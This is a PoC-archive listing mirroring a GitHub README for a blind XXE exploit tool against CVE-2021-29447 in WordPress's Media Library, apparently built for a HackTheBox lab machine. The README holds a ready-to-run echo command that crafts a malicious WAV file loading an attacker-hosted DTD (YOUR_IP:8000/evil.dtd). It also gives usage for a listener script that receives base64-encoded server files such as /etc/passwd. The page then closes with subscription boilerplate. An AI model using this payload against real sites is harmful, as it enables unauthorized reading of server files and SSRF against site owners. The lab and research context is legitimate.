Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-29447 PoC — WordPress Authenticated XXE attack when installation is running PHP 8

Source
https://github.com/elf1337/blind-xxe-controller-CVE-2021-29447
Associated Vulnerability
Title:WordPress Authenticated XXE attack when installation is running PHP 8 (CVE-2021-29447)
Description:Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
Description
Arbitrary file read controller based on CVE-2021-29447
Readme
## Blind XXE controller

I make this controller on doing metatwo machine in HackTheBox to exploiting CVE-2021-29447 which Is a WordPress XXE Vulnerability in Media Library affected version 5.7, 5.6.2, 5.6.1, 5.6, 5.0.11. where an authenticated user with ability to upload media library can upload malicious wav file that could lead to remote  arbitrary file read and server side request forgery (SSRF)

To exploit these vulnerabilitie, it takes multiple steps to complete a successful attack.That is the result of parsed iXML metadata is not sent back to the user, so to exploit it we need a blind XXE payload. This is doable by including an external Document Type Definition DTD controlled by the attacker and  we need to created the malicious wav file for getting back the connection on attacker listening server. Once we done these steps upload the wav file to server wait for receives an HTTP request that includes the base64 encoded content of our payload file eg: /etc/passwd and decode the base64. This controller has all solutions for these multiple steps. You only need type the filename on the controller **$console >** 

Detailed blog [https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/](https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/)


Note: This controller is fully configured to HTB metatwo machine. Any outside use you need too make some changes in scripts

### Usage

Create a wave file named **payload.wav**

```bash
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOUR_IP:8000/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
```

run **main.py**

```bash
python3 main.py listen_ip
```

#### POC image

![/poc/poc.png](/poc/poc.png)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →